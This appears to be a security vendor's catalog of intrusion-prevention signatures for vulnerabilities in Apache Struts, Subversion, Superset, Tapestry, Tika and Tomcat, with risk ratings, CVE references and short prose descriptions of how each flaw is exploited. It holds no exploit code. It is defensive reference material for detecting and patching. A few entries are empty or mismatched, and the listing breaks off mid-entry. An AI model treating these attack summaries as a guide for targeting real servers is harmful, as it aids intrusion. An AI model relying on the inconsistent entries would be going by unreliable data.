https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115

BID-60167
http://www.securityfocus.com/bid/60167

OSVDB-93645
http://www.osvdb.org/93645

Apache-Struts-Urlvalidator-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

High

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts 2

Type:

Input Validation

Description:

A vulnerability in Apache Struts URLValidator, versions 2.3.20 through 2.3.28.1, 2.5, which allows remote attackers to create a denial of service condition by sending a crafted HTTP request.

Situation:

HTTP_CRL-Apache-Struts-Urlvalidator-Denial-Of-Service

References:

CVE-2016-4465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4465

Apache-Struts-Wildcard-Matching-OGNL-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

Moderate

First detected in:

sgpkg-ips-529-5211

Last changed:

sgpkg-ips-1477-5242

Platform:

Generic

Software:

Apache Struts

Type:

Malfunction

Description:

There is a code execution vulnerability in Apache Struts Object-Graph Navigation Language (OGNL) expressions. The vulnerability is due to the way action names passed via Wildcard Matching to the server are evaluated by OGNL and allows arbitrary OGNL expressions encoded in a URI to be evaluated bypassing both Struts and OGNL library protections. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to a server using a vulnerable version of the software. Successful exploitation will allow an attacker to execute arbitrary OGNL code in the context of the server.

Situation:

HTTP_CSU-Suspicious-OGNL-Expression
HTTP_CSU-Suspicious-OGNL-Expression-2

References:

CVE-2013-2134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2134

BID-64758
http://www.securityfocus.com/bid/64758

OSVDB-93969
http://www.osvdb.org/93969

Apache-Struts-Xsltresult-File-Inclusion

About this vulnerability:

A vulnerability in Apache Software Foundation Struts 2

Risk:

Moderate

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts 2

Type:

Input Validation

Description:

Improper parsing of request parameters in Apach Struts 2 results in a vulnerability, which can allow an attacker to run arbitrary code.

Situation:

HTTP_CRL-Apache-Struts-Xsltresult-File-Inclusion

References:

CVE-2016-3082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3082

Apache-Struts2-File-Upload-DoS

About this vulnerability:

A vulnerability in Apache Struts2

Risk:

High

First detected in:

sgpkg-ips-1275-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts 2

Type:

Input Validation

Description:

There exists a vulnerability in Apache Struts2 framework that allows remote attackers to cause a denial of service condition by sending a crafted request, due to insufficient input validation.

Situation:

HTTP_CS-Apache-Struts2-File-Upload-DoS

References:

CVE-2019-0233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0233

Apache-Subversion-Mod_authz_SVN-Copy-Move-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Subversion

Risk:

Moderate

First detected in:

sgpkg-ips-771-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Subversion

Type:

Malfunction

Description:

There exists a NULL pointer dereference vulnerability in Apache Subversion. A remote attacker can use this to cause a Denial Of Service condition.

Situation:

HTTP_CSH-Apache-Subversion-Mod_authz_SVN-Copy-Move-Denial-Of-Service

References:

CVE-2016-2168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2168

Apache-Subversion-Mod_Dav_SVN-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Subversion

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Subversion

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in Apache Subversion. This vulnerability is due to improper dereference of an uninitialized pointer variable. A remote attacker could exploit this vulnerability by sending a recursive directory listing request. Successful exploitation could cause denial of service conditions of the target Subversion server.

Situation:

HTTP_CS-Apache-Subversion-Mod_Dav_SVN-Denial-Of-Service

References:

CVE-2018-11803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11803

Apache-Subversion-Mod_Dav_SVN-Integer-Overflow

About this vulnerability:

A vulnerability in Apache Software Foundation Subversion

Risk:

Moderate

First detected in:

sgpkg-ips-722-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Subversion

Type:

Integer Overflow

Description:

Heap overflow and out-of-bounds read vulnerabilities have been reported in the mod_dav_svn of Apache Subversion web servers. These vulnerabilities are caused by an integer overflow when parsing certain encoded requests. A remote, authenticated attacker could exploit this vulnerability by writing memory past an unspecified heap buffer. Successful exploitation on 32-bit systems could lead to code execution under context of the httpd process, as well as denial of service. Successful exploitation on 64-bit systems could lead to denial of service but not code execution.

Situation:

HTTP_CSH-Apache-Subversion-Mod_Dav_SVN-Integer-Overflow

References:

CVE-2015-5343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5343

Apache-Subversion-SVN-Protocol-Parser-Integer-Overflow

About this vulnerability:

A vulnerability in Apache Software Foundation Subversion

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Subversion

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Apache Subversion. A remote, unauthenticated attacker can send a crafted request causing a denial-of-service condition or execute arbitrary code.

Situation:

SVN_Apache-Subversion-SVN-Protocol-Parser-Integer-Overflow

References:

CVE-2015-5259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5259

Apache-Subversion-SVN-SSH-Url-Command-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Subversion

Risk:

Moderate

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Subversion

Type:

Input Validation

Description:

Improper parsing of SSH urls results in a command injection in Subversion. A successful exploitation allows arbitrary commands to be executed on the target system with the privileges of the affected user.

Situation:

HTTP_SHS-Apache-Subversion-SVN-SSH-Url-Command-Execution
File-TextId_Apache-Subversion-SVN-SSH-Url-Command-Execution
SVN_SS-Apache-Subversion-SVN-SSH-Url-Command-Execution

References:

CVE-2017-9800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9800

Apache-Superset-Import-Dashboards-CVE-2018-8021

About this vulnerability:

A vulnerability in Apache Superset

Risk:

High

First detected in:

sgpkg-ips-1384-5242

Last changed:

sgpkg-ips-1384-5242

Platform:

Generic

Software:

Apache Superset

Type:

Code Injection

Description:

There exists a remote code execution vulnerability in Apache Superset, versions before 0.23, due to an unsafe load method in the pickle library.

Situation:

HTTP_CS-Apache-Superset-Import-Dashboards-CVE-2018-8021

References:

CVE-2018-8021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8021

Apache-Superset-Insecure-Deserialization-CVE-2023-37941

About this vulnerability:

An attempt to exploit a vulnerability in Apache Superset detected

Risk:

High

First detected in:

sgpkg-ips-1634-5242

Last changed:

sgpkg-ips-1634-5242

Platform:

Generic

Software:

Apache Superset

Type:

Input Validation

Description:

If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend. This vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0.

Situation:

File-Text_Apache-Superset-Insecure-Deserialization-CVE-2023-37941

References:

CVE-2023-37941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37941

Apache-Superset-Markdown-Component-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation Incubator Superset

Risk:

Moderate

First detected in:

sgpkg-ips-1332-5242

Last changed:

sgpkg-ips-1332-5242

Platform:

Generic

Software:

Apache Superset

Type:

Input Validation

Description:

Insufficient validation of user-sent Markdown snippets in a dashboard causes a cross-site scripting vulnerability in Apache Superset.

Situation:

HTTP_CRL-Apache-Superset-Markdown-Component-Stored-Cross-Site-Scripting

References:

CVE-2021-27907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27907

Apache-Superset-Sqlite-URI-Bypass-CVE-2023-39265

About this vulnerability:

An attempt to exploit a vulnerability in Apache Superset detected

Risk:

High

First detected in:

sgpkg-ips-1633-5242

Last changed:

sgpkg-ips-1633-5242

Platform:

Generic

Software:

Apache Superset

Type:

Input Validation

Description:

Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.

Situation:

File-Text_Apache-Superset-Sqlite-URI-Bypass-CVE-2023-39265

References:

CVE-2023-39265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39265

Apache-Superset-Unrestricted-Database-Import-CVE-2023-39265

About this vulnerability:

An attempt to exploit a vulnerability in Apache Superset detected

Risk:

High

First detected in:

sgpkg-ips-1633-5242

Last changed:

sgpkg-ips-1634-5242

Platform:

Generic

Software:

Apache Superset

Type:

Input Validation

Description:

References:

CVE-2023-39265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39265

Apache-Superset-Url-Shortener-Open-Redirect

About this vulnerability:

A vulnerability in Apache Software Foundation Incubator Superset

Risk:

Moderate

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Generic

Software:

Apache Superset

Type:

Input Validation

Description:

An open redirect vulnerability has been reported in Apache Superset. This vulnerability is due to improper validation of user-supplied input for the URL shortener functionality. A remote attacker can exploit this vulnerability by creating a link to an external URL using the URL shortener functionality. Successful exploitation would allow the attacker to spoof a user to open a link to a external site.

Situation:

HTTP_CRL-Apache-Superset-Url-Shortener-Open-Redirect

References:

CVE-2021-28125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28125

Apache-SVN-Authzsvnreposrelativeaccessfile-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Apache Software Foundation Subversion

Risk:

Moderate

First detected in:

sgpkg-ips-1326-5242

Last changed:

sgpkg-ips-1326-5242

Platform:

Generic

Software:

Subversion

Type:

Input Validation

Description:

Improper handling of requests for non-existing repository URLs when the server is using in-repository authz rules with the AuthzSVNReposRelativeAccessFile option causes a null pointer dereference vulerability which can cause a denial of service condition when triggered.

Situation:

HTTP_CSU-Apache-Subversion-Authzsvnreposrelativeaccessfile-Null-Pointer-Dereference

References:

CVE-2020-17525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17525

Apache-Tapestry-Classpathassetrequesthandler-Information-Disclosure

About this vulnerability:

A vulnerability in Apache Software Foundation Tapestry

Risk:

Moderate

First detected in:

sgpkg-ips-1343-5242

Last changed:

sgpkg-ips-1343-5242

Platform:

Generic

Software:

Apache Tapestry

Type:

Input Validation

Description:

Improper input validation and URL manipulation causes a vulnerability in Apache Tapestry. A successful exploit allows an attacker to access data on the target system.

Situation:

HTTP_CRL-Apache-Tapestry-Classpathassetrequesthandler-Information-Disclosure

References:

CVE-2021-27850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27850

Apache-Tapestry-ContextAssetRequestHandler-Information-Disclosure

About this vulnerability:

A vulnerability in Apache Tapestry

Risk:

High

First detected in:

sgpkg-ips-1288-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tapestry

Type:

Input Validation

Description:

There exists a vulnerability in Apache Tapestry, versions 5.4.0 to 5.5.0, which allows remote attackers to retrieve files inside the WEB-INF folder by sending a crafted URL.

Situation:

HTTP_CSU_Apache-Tapestry-ContextAssetRequestHandler-Information-Disclosure

References:

CVE-2020-13953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13953

Apache-Tika-Chmparser-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Apache Tika

Risk:

Moderate

First detected in:

sgpkg-ips-1069-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tika

Type:

Input Validation

Description:

Improper handling of Microsoft Compiled HTML Help files causes a vulnerability in Apache Tika. A successful exploit allows an attacker to cause a denial of service condition on the target system.

Situation:

File-Binary_Apache-Tika-Chmparser-Denial-Of-Service

References:

CVE-2018-1339
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1339

Apache-Tika-Header-Command-Injection

About this vulnerability:

A vulnerability in Apache Tika

Risk:

High

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Apache Tika

Type:

Input Validation

Description:

A vulnerability in Apache Tika, versions 1.15 - 1.17, which allows remote attackers to execute arbitrary code using specially crafted headers.

Situation:

HTTP_CS-Apache-Tika-Header-Command-Injection

References:

CVE-2018-1335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1335

Apache-Tika-Server-Command-Injection-Vulnerability

About this vulnerability:

A vulnerability in Apache Software Foundation Apache Tika

Risk:

Moderate

First detected in:

sgpkg-ips-1070-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tika

Type:

Input Validation

Description:

Improper validation of request headers causes a command injection vulnerability in Apache Tika. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CSH-Apache-Tika-Server-Command-Injection-Vulnerability

References:

CVE-2018-1335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1335

Apache-Tomcat-ajp-Local-File-Inclusion

About this vulnerability:

A vulnerability in Apache Tomcat

Risk:

Moderate

First detected in:

sgpkg-ips-1233-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Malfunction

Description:

There exists a local file inclusion vulnerability in Apache Tomcat. Successful exploitation could lead in the disclosure of file on the target server.

Situation:

Generic_CS-Apache-Tomcat-ajp-Local-File-Inclusion

References:

CVE-2020-1938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938

Apache-Tomcat-Allowlinking-Uriencoding-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in the Apache Tomcat.

Situation:

HTTP_CSU-Apache-Tomcat-Allowlinking-Uriencoding-Directory-Traversal

References:

CVE-2008-2938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938

BID-30633
http://www.securityfocus.com/bid/30633

Apache-Tomcat-CGIServlet-enableCmdLineArguments-RCE

About this vulnerability:

A vulnerability in Apache Tomcat CGIServlet

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Apache Tomcat

Type:

Malfunction

Description:

A vulnerability in Apache Tomcat CGIServlet, versions 9.0 and before, which allows remote attackers to execute arbitrary code due to a bug in the way command line arguments are passed.

Situation:

HTTP_CSU-Remote-Code-Execution-Via-Cgi-Batch-Arguments

References:

CVE-2019-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0232

Apache-Tomcat-Chunked-Transfer-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

Moderate

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

A denial of service vulnerability has been identified in Apache Tomcat as it processes Chunked-Transfer encoded requests. The error is caused by Tomcat not discarding any extensions included in very long Chunked-transfer requests, even if they were not processed. A remote attacker could exploit this vulnerability to send a large amount of data to the server causing it to use up excessive resources. This can result in a limited denial of service condition.

Situation:

HTTP_CS-Apache-Tomcat-Chunked-Transfer-Denial-Of-Service
HTTP_CCH-Apache-Tomcat-Chunked-Transfer-Denial-Of-Service

References:

CVE-2012-3544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3544

BID-59797
http://www.securityfocus.com/bid/59797

BID-64758
http://www.securityfocus.com/bid/64758

OSVDB-93253
http://www.osvdb.org/93253

Apache-Tomcat-Chunkedinputfilter-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

High

First detected in:

sgpkg-ips-938-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Resource Starvation

Description:

There exists a resource exhaustion vulnerability in Apache Tomcat.

Situation:

HTTP_CS-Apache-Tomcat-Chunkedinputfilter-Denial-Of-Service

References:

CVE-2014-0227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227

OSVDB-118214
http://www.osvdb.org/118214

Apache-Tomcat-Chunkedinputfilter-Malformed-Chunk-Size-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

Moderate

First detected in:

sgpkg-ips-592-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Resource Starvation

Description:

A denial of service vulnerability exists in Apache Tomcat Application Server. The vulnerability is due to a failure to limit the chunk size in an HTTP request. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious chunk size in an HTTP request. Successful exploitation could lead to a denial of service condition on the server.

Situation:

HTTP_CCH-Maliciously-Large-Chunk-Size

References:

CVE-2014-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0075

BID-67671
http://www.securityfocus.com/bid/67671

OSVDB-107450
http://www.osvdb.org/107450

Apache-Tomcat-Default-Servlet-Open-Redirect

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

Moderate

First detected in:

sgpkg-ips-1116-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

Insufficient sanitization of redirections causes a vulnerability in Apache Tomcat. A successful exploit allows an attacker to redirect users to spoofed sites.

Situation:

HTTP_SHS-Apache-Tomcat-Default-Servlet-Open-Redirect

References:

CVE-2018-11784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11784

Apache-Tomcat-Directory-Listing-Information-Disclosure

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

Low

First detected in:

sgpkg-ips-357-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Malfunction

Description:

There exists an arbitrary directory Information Disclosure vulnerability in Apache Tomcat. The flaw is caused by overly lax default permissions set by the product. An attacker may exploit this vulnerability to retrieve a complete listing of all the files in any directory. The target will not exhibit any unusual behaviour as a result of this attack. A successful attack will result in potentially sensitive information being disclosed to an unprivileged user. The list of files in any directory specified by the attacker in the request will be served in the HTTP response.

Situation:

HTTP_CRL-Apache-Tomcat-Directory-Listing-Information-Disclosure

References:

BID-19106
http://www.securityfocus.com/bid/19106

Apache-Tomcat-Fileupload-Content-Type-Header-Infinite-Loop

About this vulnerability:

A vulnerability in Apache Software Foundation Commons FileUpload

Risk:

Moderate

First detected in:

sgpkg-ips-566-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Infinite Loop

Description:

An infinite loop vulnerability exists in Apache Tomcat. The vulnerability is due to insufficient boundary checks when processing the Content-Type header of a multipart request. A remote attacker could exploit this vulnerability by sending a large amount of data to the server causing it to use up excessive resources. Successful exploitation could cause a denial of service condition on the server.

Situation:

HTTP_CSH-Apache-Tomcat-Fileupload-Content-Type-Header-Infinite-Loop

References:

CVE-2014-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050

BID-65400
http://www.securityfocus.com/bid/65400

OSVDB-102945
http://www.osvdb.org/102945

Apache-Tomcat-Formauthenticator-Open-Redirect

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

Moderate

First detected in:

sgpkg-ips-1642-5242

Last changed:

sgpkg-ips-1642-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

Insufficient sanitization of crafted URLs causes an open redirect vulnerability in Apache Tomcat. A successful exploit allows an attacker to direct traffic to and a malicious website.

Situation:

HTTP_CSU-Apache-Tomcat-Formauthenticator-Open-Redirect

References:

CVE-2023-41080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41080

Apache-Tomcat-getCanonicalPath-Remote-Code-Execution-CVE-2024-56337

About this vulnerability:

A vulnerability in Apache Tomcat

Risk:

High

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Apache Tomcat. The vulnerability is due to caching of attacker-controlled values in certain versions of Java. A remote, unauthenticated attacker can exploit this vulnerability by uploading a file with an allowed name, poisoning the cache, and accessing the uploaded file by using a crafted name. Successful exploitation could result in the execution of arbitrary code under the security context of the target service.

Situation:

File-Text_Suspicious-Jsp-File-Content-Upload

References:

CVE-2024-56337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56337

Apache-Tomcat-HTTP-Put-Windows-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

Moderate

First detected in:

sgpkg-ips-998-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

Insufficient validation of PUT requests causes a code execution vulnerability in Apache Tomcat. A successful exploit allows arbitrary code to be run remotely without authentication.

Situation:

HTTP_CSU-Apache-Tomcat-HTTP-Put-Windows-Remote-Code-Execution

References:

CVE-2017-12615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12615

Apache-Tomcat-HTTP2-Denial-of-Service

About this vulnerability:

A vulnerability in Apache Tomcat

Risk:

High

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1761-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Malfunction

Description:

A vulnerability in Apache Tomcat, versions 8.5.0 to 8.5.37 and 9.0.0.M1 to 9.0.14, which allows remote attackers to cause a denial of service condition by sending a large amount of HTTP/2 requests to the target server, due to the isufficient handling of excessive SETTINGS frames.

Situation:

HTTP_CRL-Apache-Tomcat-HTTP2-Denial-of-Service

References:

CVE-2019-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0199

Apache-Tomcat-HTTP2parser-Denial-Of-Service-CVE-2024-24549

About this vulnerability:

A vulnerability in Apache Tomcat

Risk:

High

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Malfunction

Description:

An denial of service vulnerability has been reported in the HTTP/2 module of Apache Tomcat. The vulnerability is due improper validation of HTTP/2 headers. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted HTTP/2 requests to the vulnerable server. Successful exploitation results in parsing an amount of data that leads to denial of service conditions.

Situation:

HTTP_CS-Apache-Tomcat-HTTP2parser-Denial-Of-Service-CVE-2024-24549

References:

CVE-2024-24549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24549

Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813

About this vulnerability:

An attempt to exploit a vulnerability in Apache Tomcat detected

Risk:

High

First detected in:

sgpkg-ips-1851-5242

Last changed:

sgpkg-ips-1852-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

Path equivalence: 'file.Name' (internal dot) leading to remote code execution and/or information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.

Situation:

HTTP_CSH-Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813
File-Binary_Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813

References:

CVE-2025-24813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24813

Apache-Tomcat-JmxRemoteLifecycleListener-Remote-Code-Execution-CVE-2016-8735

About this vulnerability:

An attempt to exploit a vulnerability in Apache Tomcat detected

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if "JmxRemoteLifecycleListener" is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.

Situation:

HTTP_CSH-Apache-Tomcat-Large-Chunked-Transfer-Denial-Of-Service

References:

CVE-2016-8735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8735

Apache-Tomcat-Large-Chunked-Transfer-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation Tomcat

Risk:

Moderate

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

A denial of service vulnerability has been identified in Apache Tomcat as it processes Chunked-Transfer encoded requests. The error is caused by Tomcat not discarding any extensions included in very long Chunked-transfer requests, even if they were not processed. This vulnerability is due to an incomplete fix for CVE-2012-3544. A remote attacker could exploit this vulnerability by sending a large amount of data to the server causing it to use up excessive resources. This can result in a limited denial of service condition.

Situation:

References:

CVE-2013-4322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322

BID-65767
http://www.securityfocus.com/bid/65767

OSVDB-103706
http://www.osvdb.org/103706

Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution

About this vulnerability:

An Apache Tomcat Manager Authenticated Upload Code Execution vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-786-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Apache Tomcat

Type:

Insecure Configuration

Description:

A vulnerability in Apache Tomcat Manager which allows remote attackers to upload jsp applications as a WAR archive to the /manager/html/upload component.

Situation:

HTTP_CS-Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution
HTTP_CS-Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution-2

References:

CVE-2010-4094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4094

BID-36954
http://www.securityfocus.com/bid/36954

OSVDB-60176
http://www.osvdb.org/60176

Apache-Tomcat-Maxparametercount-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Tomcat

Risk:

High

First detected in:

sgpkg-ips-1641-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported for Apache Tomcat. This vulnerability is due to resource exhaustion in the Parameter component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

HTTP_CRL-Apache-Tomcat-Maxparametercount-Denial-Of-Service

References:

CVE-2023-28709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28709

Apache-Tomcat-Mod_jk.so-URI-Worker-Long-Url-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Apache Tomcat mod_jk.so with long URLs

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Apache Tomcat

Type:

Buffer Overflow

Description:

Apache Tomcat's JK Web Server Connector mod_jk.so contains a buffer overflow vulnerability in the handling of long URLs. A specially crafted URL can result in a stack-based buffer overflow and allow remote attackers to execute arbitrary code on the vulnerable host.

Situation:

HTTP_CSH-ShellCode-In-User-Agent
HTTP_CSU-Apache-Tomcat-Mod-jk.so-URI-Worker-Long-Url-Buffer-Overflow-2

References:

CVE-2007-0774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0774

BID-22791
http://www.securityfocus.com/bid/22791

Apache-Tomcat-Servlet-Engine-Directory-Traversal

About this vulnerability:

Directory traversal vulnerability in Apache Tomcat

Risk:

Moderate

First detected in:

sgpkg-ips-100-1314

Last changed:

sgpkg-ips-1645-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in Apache Tomcat. The vulnerability is due to an input validation error in Tomcat that does not properly sanitize the URI for the directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server.

Situation:

HTTP_CSU-Apache-Tomcat-Servlet-Engine-Directory-Traversal-2

References:

CVE-2007-0450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450

BID-22960
http://www.securityfocus.com/bid/22960

Apache-Tomcat-Transfer-Encoding-Information-Disclosure

About this vulnerability:

An Apache Tomcat Transfer-Encoding Information Disclosure vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-794-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

A vulnerability in Apache Tomcat, versions 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta, which allows remote attackers to obtain sensitive information via a crafted header due to the improper handling of an invalid Transfer-Encoding header.

Situation:

HTTP_CS-Apache-Tomcat-Transfer-Encoding-Information-Disclosure

References:

CVE-2010-2227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227

BID-41544
http://www.securityfocus.com/bid/41544

OSVDB-66319
http://www.osvdb.org/66319

Apache-Tomcat-User-Enumeration

About this vulnerability:

An Apache Tomcat User Enumeration vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-726-5211

Last changed:

